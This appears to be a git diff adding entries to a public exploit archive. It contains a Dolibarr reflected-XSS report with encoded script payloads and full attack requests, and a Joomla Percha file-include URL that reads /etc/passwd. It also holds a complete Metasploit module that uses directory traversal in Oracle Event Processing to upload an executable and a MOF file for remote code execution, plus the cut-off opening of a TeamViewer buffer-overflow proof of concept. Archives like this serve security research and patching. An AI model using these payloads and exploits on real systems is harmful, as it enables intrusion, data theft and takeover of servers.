encapsulated in single quotation marks. The payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%33%38%31%37%29%3c%2f%73%43%72%49%70%54%3e was submitted in the leftmenu parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. + +HTTP request: +GET /dolibarr/index.php?mainmenu=home&leftmenu=%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%33%38%31%37%29%3c%2f%73%43%72%49%70%54%3e&optioncss=print HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost:8082/dolibarr/index.php?mainmenu=home&leftmenu= +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive + +Affected parameter(s): leftmenu + + + + + +Steps to replicate: +31. Open Dolibarr application in browser. +32. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +33. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +34. Manipulate leftmenu parameter value with payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e +or submit http://localhost/dolibarr/index.php?mainmenu=home&leftmenu=%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&optioncss=print in address bar and see the output in browser +35. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +? +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/viewimage.php +Affected Users: All authenticated users + +Issue details: The value of the modulepart request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %3cscript%3ealert%2892207%29%3c%2fscript%3e was submitted in the modulepart parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. + +HTTP request: +GET /dolibarr/viewimage.php?modulepart=userphoto%3cscript%3ealert%2892207%29%3c%2fscript%3e&entity=1&file=2%2F0%2F1234&cache=0 HTTP/1.0 +Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94 +Accept: */* +Accept-Language: en-US +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) +Host: localhost +Referer: http://localhost/dolibarr/user/fiche.php?id=2 + +Affected parameter(s): modulepart + +Steps to replicate: +36. Open Dolibarr application in browser. +37. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +38. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +39. Manipulate modulepart parameter value with payload %3cscript%3ealert%2892207%29%3c%2fscript%3e +or submit http://localhost/dolibarr/viewimage.php?modulepart=userphoto%3cscript%3ealert%2892207%29%3c%2fscript%3e&entity=1&file=2%2F0%2F1234&cache=0 in address bar and see the output in browser +40. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +? +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/viewimage.php +Affected Users: All authenticated users + +Issue details: The value of the file request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e was submitted in the modulepart parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. + +HTTP request: +GET /dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e&cache=0 HTTP/1.0 +Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94 +Accept: */* +Accept-Language: en-US +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) +Host: localhost +Referer: http://localhost/dolibarr/user/fiche.php?id=2 + +Affected parameter(s): file + +Steps to replicate: +41. Open Dolibarr application in browser. +42. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +43. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +44. Manipulate file parameter value with payload 2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e +or submit http://localhost/dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e&cache=0 in address bar and see the output in browser +45. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon + +Below URLs are also vulnerable with XSS. + +Parameter URL +dol_use_jmobile http://localhost/dolibarr/user/index.php +dol_optimize_smallscreen http://localhost/dolibarr/user/index.php +dol_no_mouse_hover http://localhost/dolibarr/user/index.php +dol_hide_topmenu http://localhost/dolibarr/user/index.php +dol_hide_leftmenu http://localhost/dolibarr/user/index.php +dol_use_jmobile http://localhost/dolibarr/user/logout.php +dol_optimize_smallscreen http://localhost/dolibarr/user/logout.php +dol_no_mouse_hover http://localhost/dolibarr/user/logout.php +dol_hide_topmenu http://localhost/dolibarr/user/logout.php +dol_hide_leftmenu http://localhost/dolibarr/user/logout.php + + + + + + + diff --git a/platforms/php/webapps/34008.txt b/platforms/php/webapps/34008.txt new file mode 100755 index 000000000..30d265acd --- /dev/null +++ b/platforms/php/webapps/34008.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/40244/info + +Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +The following Percha components are affected: + +com_perchaimageattach +com_perchafieldsattach +com_perchadownloadsattach +com_perchagallery +com_perchacategoriestree + +http://www.example.com/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/windows/remote/33989.rb b/platforms/windows/remote/33989.rb new file mode 100755 index 000000000..6176334d8 --- /dev/null +++ b/platforms/windows/remote/33989.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Oracle Event Processing FileUploadServlet Arbitrary File Upload', + 'Description' => %q{ + This module exploits an Arbitrary File Upload vulnerability in Oracle Event Processing + 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be + abused to upload a malicious file onto an arbitrary location due to a directory traversal + flaw, and compromise the server. By default Oracle Event Processing uses a Jetty + Application Server without JSP support, which limits the attack to WbemExec. The current + WbemExec technique only requires arbitrary write to the file system, but at the moment the + module only supports Windows 2003 SP2 or older. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-2424'], + ['ZDI', '14-106'], + ['BID', '66871'], + ['URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html'] + ], + 'DefaultOptions' => + { + 'WfsDelay' => 5 + }, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 2048 + }, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => + [ + ['Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 21 2014')) + + register_options( + [ + Opt::RPORT(9002), + # By default, uploads are stored in: + # C:\Oracle\Middleware\user_projects\domains\\defaultserver\upload\ + OptInt.new('DEPTH', [true, 'Traversal depth', 7]) + ], self.class) + end + + def upload(file_name, contents) + post_data = Rex::MIME::Message.new + post_data.add_part(rand_text_alpha(4 + rand(4)), nil, nil, "form-data; name=\"Filename\"") + post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"#{file_name}\"") + data = post_data.to_s + + res = send_request_cgi({ + 'uri' => '/wlevs/visualizer/upload', + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => data + }) + + res + end + + def traversal + "../" * datastore['DEPTH'] + end + + def exploit + print_status("#{peer} - Generating payload and mof file...") + mof_name = "#{rand_text_alpha(rand(5)+5)}.mof" + exe_name = "#{rand_text_alpha(rand(5)+5)}.exe" + exe_content = generate_payload_exe + mof_content = generate_mof(mof_name, exe_name) + + print_status("#{peer} - Uploading the exe payload #{exe_name}...") + exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}" + res = upload(exe_traversal, exe_content) + + unless res && res.code == 200 && res.body.blank? + print_error("#{peer} - Unexpected answer, trying anyway...") + end + register_file_for_cleanup(exe_name) + + print_status("#{peer} - Uploading the MOF file #{mof_name}") + mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}" + upload(mof_traversal, mof_content) + register_file_for_cleanup("wbem/mof/good/#{mof_name}") + end + + def check + res = send_request_cgi({ + 'uri' => '/ohw/help/state', + 'method' => 'GET', + 'vars_get' => { + 'navSetId' => 'cepvi', + 'navId' => '0', + 'destination' => '' + } + }) + + if res && res.code == 200 + if res.body.to_s.include?("Oracle Event Processing 11g Release 1 (11.1.1.7.0)") + return Exploit::CheckCode::Detected + elsif res.body.to_s.include?("Oracle Event Processing 12") + return Exploit::CheckCode::Safe + end + end + + Exploit::CheckCode::Unknown + end + +end \ No newline at end of file diff --git a/platforms/windows/remote/34002.c b/platforms/windows/remote/34002.c new file mode 100755 index 000000000..caff3f1be --- /dev/null +++ b/platforms/windows/remote/34002.c @@ -0,0 +1,116 @@ +source: http://www.securityfocus.com/bid/40242/info + +TeamViewer is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +An attacker can leverage this issue to execute arbitrary code within the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition. + +TeamViewer 5.0.8232 is vulnerable; other versions may be affected. + +#include +#include +#include +#include +#include + +#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n) +#define POCNAME "[*]TeamViewer 5.0.8232 remote BOF poc(0day)" +#define AUTHOR "[*]fl0 fl0w" + + typedef int i32; + typedef char i8; + typedef short i16; + enum { + True=1, + False=0, + Error=-1 + }; + struct linger ling = {1,1}; + i8* host; + i16 port; + i32 ver1,ver2,slen; + void syntax(){ + i8 *help[]={"\t-h hostname", + "\t-p port(default 5938)", + }; + i32 i; + size_t com=sizeof help / sizeof help[0]; + for(i=0;i